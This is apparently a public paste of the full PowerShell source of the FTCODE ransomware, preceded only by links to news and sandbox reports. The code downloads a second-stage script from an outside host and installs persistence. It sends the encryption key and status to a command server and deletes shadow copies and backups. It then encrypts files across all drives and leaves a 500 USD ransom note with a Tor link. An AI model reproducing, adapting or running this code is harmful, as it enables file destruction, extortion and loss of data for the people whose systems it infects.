ps66uk icon

#FTCODE

ps66uk | PRO | 10/07/19 10:18:50 AM UTC | 0 ⭐ | 3300 👁️ | Never ⏰ | []
PowerShell |

9 KB

|

None

|

0 👍

/

0 👎

<# FTCODE ransomware
https://twitter.com/matte_lodi/status/1181124751160422401
https://www.bleepingcomputer.com/news/security/ftcode-powershell-ransomware-resurfaces-in-spam-campaign/
https://app.any.run/tasks/aab1ffcb-98e3-4bc9-9be2-5e82fe528484
#>
 
 
function dywxjbzzg() {
    $hjtjyuwxz = $env:PUBLIC  +  "\Libraries" if ( - not (Test - Path $hjtjyuwxz))  {
        md $hjtjyuwxz;
    }
 
    $ivvbdgxjdg = $hjtjyuwxz  +  "\WindowsIndexingService.vbs";
    $dbugtxcs = New - Object System.Net.WebClient;
    $dbugtxcs.Credentials = [System.Net.CredentialCache]::DefaultCredentials;
    try {
        $uceycjf = Join - Path $hjtjyuwxz ( get - random  - minimum 100  - maximum 999999 );
        $dbugtxcs.DownloadString("http://home.healthiestu.com/?need=6ff4040&vid=dpec6&") | out - file $uceycjf;
        Start - Sleep  - s 5;
        if ( ( test - path  - path $uceycjf )  - and ( ( (Get - Item $uceycjf).length/1KB) -gt 5 ) ){ Move-Item $uceycjf -destination $ivvbdgxjdg -Force; $fagtzcgfg = (schtasks.exe /create /TN "WindowsApplicationService" /sc DAILY /st 00:00 /f /RI 13 /du 23:59  / TR $ivvbdgxjdg);
        try {
            $uyuhszzt = [Environment]::GetFolderPath('Startup')  +  '\WindowsApplicationService.lnk';
            if (  - not ( Test - Path $uyuhszzt ) )  {
                $cibauhvg = New - Object  - ComObject ('WScript.Shell');
                $vhvwiyeuxd = $cibauhvg.CreateShortcut( $uyuhszzt );
                $vhvwiyeuxd.TargetPath = $ivvbdgxjdg;
                $vhvwiyeuxd.WorkingDirectory = $hjtjyuwxz;
                $vhvwiyeuxd.WindowStyle = 1;
                $vhvwiyeuxd.Description = 'Windows Application Service';
                $vhvwiyeuxd.Save();
            }
 
        } catch {};
    }
 
} catch {}
 
};
dywxjbzzg;
function hjgcwfsiei( $ifwxibhss ) {
$dbugtxcs = New - Object System.Net.WebClient;
$dbugtxcs.Credentials = [System.Net.CredentialCache]::DefaultCredentials;
$dbugtxcs.Headers.Add("Content-Type", "application/x-www-form-urlencoded");
$dbugtxcs.Encoding = [System.Text.Encoding]::UTF8;
try {
    $tafjssfc = $dbugtxcs.UploadString( "http://connect.hairsalonlongmont.com/", ("ver=$scwgygzdu&vid=dpec6&guid=$ijwctat&psver=" + ( ( (Get - Host).Version ).Major ) + "&"  +  $ifwxibhss) );
    if ( $tafjssfc  - eq "ok" )  {
        return $true;
    }
 
} catch {};
return $false;
};
function ddbjeajiiz( $ghhzgav ) {
try {
    Start - Process  - WindowStyle Hidden  - FilePath "$env:comspec"  - ArgumentList "/c $ghhzgav";
} catch {}
 
};
function dwfuacxisj($xwfvsfb, $izhzdwi) {
$yavhiujvsg = "BXCODE hack your system";
$bscdvvix = "BXCODE INIT";
$hygazadbij = new - Object System.Security.Cryptography.RijndaelManaged;
$tzbhbhutb = [Text.Encoding]::UTF8.GetBytes($izhzdwi);
$yavhiujvsg = [Text.Encoding]::UTF8.GetBytes($yavhiujvsg);
$hygazadbij.Key = (new - Object Security.Cryptography.PasswordDeriveBytes $tzbhbhutb, $yavhiujvsg, "SHA1", 5).GetBytes(32);
$hygazadbij.IV = (new - Object Security.Cryptography.SHA1Managed).ComputeHash( [Text.Encoding]::UTF8.GetBytes($bscdvvix) )[0..15];
$hygazadbij.Padding = "Zeros";
$hygazadbij.Mode = "CBC";
$fyyxdehdbx = $hygazadbij.CreateEncryptor();
$zudjbafz = new - Object IO.MemoryStream;
$hzewbxas = new - Object Security.Cryptography.CryptoStream $zudjbafz, $fyyxdehdbx, "Write";
$hzewbxas.Write($xwfvsfb, 0, $xwfvsfb.Length);
$hzewbxas.Close();
$zudjbafz.Close();
$hygazadbij.Clear();
return $zudjbafz.ToArray();
}
 
$scwgygzdu = "1003.1";
$ijwctat = [guid]::NewGuid();
$zvjethg = $env:temp  +  "\AFX50058.tmp";
sc  - Path $zvjethg  - Value $(Get - Date);
$bjiewwwwg = [Reflection.Assembly]::LoadWithPartialName('System.Security');
Add - Type  - Assembly System.Web;
$hjtjyuwxz = $env:PUBLIC  +  "\OracleKit";
if ( - not (Test - Path $hjtjyuwxz))  {
md $hjtjyuwxz;
}
 
$jeuacfx = $hjtjyuwxz  +  "\w00log03.tmp";
if ( Test - Path $jeuacfx )  {
hjgcwfsiei "status=exit_file";
exit;
} else {
sc  - Path $jeuacfx  - Value $ijwctat  - Force;
};
$uebvuvzztb = [Web.Security.Membership]::GeneratePassword(50, 4);
[byte[]]$zhfvjij = [system.Text.Encoding]::Unicode.GetBytes($uebvuvzztb);
$cffitahbbi = "BgIAAACkAABSU0ExAAQAAAEAAQDTYUZyVxhh48R/1Y/H5NdEgi49DIHtJTXm+mcVHnvUpYiNEnxpFj/UJXVDg0F2rfWFpnyqHJ0dbyjsOCwMX0eRyp2VxrWFzOHIM6QpevxGF9izXeNq7+OzBuo11V/7EmvQBW2sfuNEOP7zdUw0DFKoK+X2Taewaki1LGYhpshjqg==";
$dtghzhtgz = New - Object System.Security.Cryptography.RSACryptoServiceProvider;
$dtghzhtgz.ImportCspBlob([system.Convert]::FromBase64String($cffitahbbi));
$ueuzadcuga = [system.Convert]::ToBase64String($dtghzhtgz.Encrypt($zhfvjij, $false));
if ( ( hjgcwfsiei( "&ek="  +  ([Convert]::ToBase64String([Text.Encoding]::UTF8.GetBytes( $uebvuvzztb ) )) ) ) )  {
sc  - Path $jeuacfx  - Value $ijwctat  - Force;
} else {
ri  - Path $jeuacfx  - Force;
hjgcwfsiei "status=exit_answer";
exit;
}
 
sbyxvbzxuv = "
All your files was encrypted!
Yes, You can Decrypt Files Encrypted!!! our price 500 USD
Your personal ID: $ijwctat
 
1. Download Tor browser - https://www.torproject.org/download/
 
2. Install Tor browser
 
3. Open Tor Browser
 
4. Open link in TOR browser: http://qvo5sd7p5yazwbrgioky7rdu4vslxrcaeruhjr7ztn3t2pihp56ewlqd.onion/?guid=$ijwctat
 
5. Follow the instructions on this page
 
***** Warning*****
Do not rename files
 
Do not try to back your data using third-party software, it may cause permanent data loss(If you do not believe us, and still try to - make copies of all files so that we can help you if third-party software harms them)
 
As evidence, we can for free back one file
 
Decoders of other users is not suitable to back your files - encryption key is created on your computer when the program is launched - it is unique.
 
";
ddbjeajiiz('bcdedit /set ztcxebbwya bootstatuspolicy ignoreallfailures');
ddbjeajiiz('bcdedit /set ztcxebbwya recoveryenabled no');
ddbjeajiiz('wbadmin delete catalog -quiet');
ddbjeajiiz('wbadmin delete systemstatebackup');
ddbjeajiiz('wbadmin delete backup');
ddbjeajiiz('vssadmin delete shadows /all /quiet');
$ifggctxeja = 0;
hjgcwfsiei ("status=start" );
$judcuxzwd = Get - PSDrive|Where - Object {
$_.Free  - gt 50000
}
 
|Sort - Object  - Descending;
foreach($bdwwbwxtey in $judcuxzwd) {
try {
    gci $bdwwbwxtey.root  - Recurse  - Include "*.sql", "*.mp4", "*.7z", "*.rar", "*.m4a", "*.wma", "*.avi", "*.wmv", "*.csv", "*.d3dbsp", "*.zip", "*.sie", "*.sum", "*.ibank", "*.t13", "*.t12", "*.qdf", "*.gdb", "*.tax", "*.pkpass", "*.bc6", "*.bc7", "*.bkp", "*.qic", "*.bkf", "*.sidn", "*.sidd", "*.mddata", "*.itl", "*.itdb", "*.icxs", "*.hvpl", "*.hplg", "*.hkdb", "*.mdbackup", "*.syncdb", "*.gho", "*.cas", "*.svg", "*.map", "*.wmo", "*.itm", "*.sb", "*.fos", "*.mov", "*.vdf", "*.ztmp", "*.sis", "*.sid", "*.ncf", "*.menu", "*.layout", "*.dmp", "*.blob", "*.esm", "*.vcf", "*.vtf", "*.dazip", "*.fpk", "*.mlx", "*.kf", "*.iwd", "*.vpk", "*.tor", "*.psk", "*.rim", "*.w3x", "*.fsh", "*.ntl", "*.arch00", "*.lvl", "*.snx", "*.cfr", "*.ff", "*.vpp_pc", "*.lrf", "*.m2", "*.mcmeta", "*.vfs0", "*.mpqge", "*.kdb", "*.db0", "*.dba", "*.rofl", "*.hkx", "*.bar", "*.upk", "*.das", "*.iwi", "*.litemod", "*.asset", "*.forge", "*.ltx", "*.bsa", "*.apk", "*.re4", "*.sav", "*.lbf", "*.slm", "*.bik", "*.epk", "*.rgss3a", "*.pak", "*.big", "*wallet", "*.wotreplay", "*.xxx", "*.desc", "*.py", "*.m3u", "*.flv", "*.js", "*.css", "*.rb", "*.png", "*.jpeg", "*.txt", "*.p7c", "*.p7b", "*.p12", "*.pfx", "*.pem", "*.crt", "*.cer", "*.der", "*.x3f", "*.srw", "*.pef", "*.ptx", "*.r3d", "*.rw2", "*.rwl", "*.raw", "*.raf", "*.orf", "*.nrw", "*.mrwref", "*.mef", "*.erf", "*.kdc", "*.dcr", "*.cr2", "*.crw", "*.bay", "*.sr2", "*.srf", "*.arw", "*.3fr", "*.dng", "*.jpe", "*.jpg", "*.cdr", "*.indd", "*.ai", "*.eps", "*.pdf", "*.pdd", "*.psd", "*.dbf", "*.mdf", "*.wb2", "*.rtf", "*.wpd", "*.dxg", "*.xf", "*.dwg", "*.pst", "*.accdb", "*.mdb", "*.pptm", "*.pptx", "*.ppt", "*.xlk", "*.xlsb", "*.xlsm", "*.xlsx", "*.xls", "*.wps", "*.docm", "*.docx", "*.doc", "*.odb", "*.odc", "*.odm", "*.odp", "*.ods", "*.odt" |% {
        try {
            $tssdvahsgi = [io.file]::Open($_, 'Open', 'ReadWrite');
            if ($tssdvahsgi.Length  - lt "40960")  {
                $fizeigzsuu = $tssdvahsgi.Length 
            } else {
                $fizeigzsuu = "40960" 
            }
 
            [byte[]]$azwwezuyyz = new - object byte[] $fizeigzsuu;
            $asihybvzh = $tssdvahsgi.Read($azwwezuyyz, 0, $azwwezuyyz.Length);
            $tssdvahsgi.Position = '0';
            $axshudetg = dwfuacxisj $azwwezuyyz $uebvuvzztb;
            $tssdvahsgi.Write($axshudetg, 0, $axshudetg.Length);
            $tssdvahsgi.Close();
            $uhhzdshvj = $_.Name + ".FTCODE";
            ren  - Path $_.FullName  - NewName $uhhzdshvj  - Force;
            $yjxegdax = $_.DirectoryName + "\READ_ME_NOW.htm";
            if (!(Test - Path $yjxegdax))  {
                sc  - Path $yjxegdax  - Value $sbyxvbzxuv  - Force;
                sc  - Path $zvjethg  - Value $(Get - Date)  - Force;
            }
 
            $ifggctxeja++;
        } catch {}
 
    }
 
} catch {}
 
}
 
hjgcwfsiei ("status=done&res=$ifggctxeja");

Comments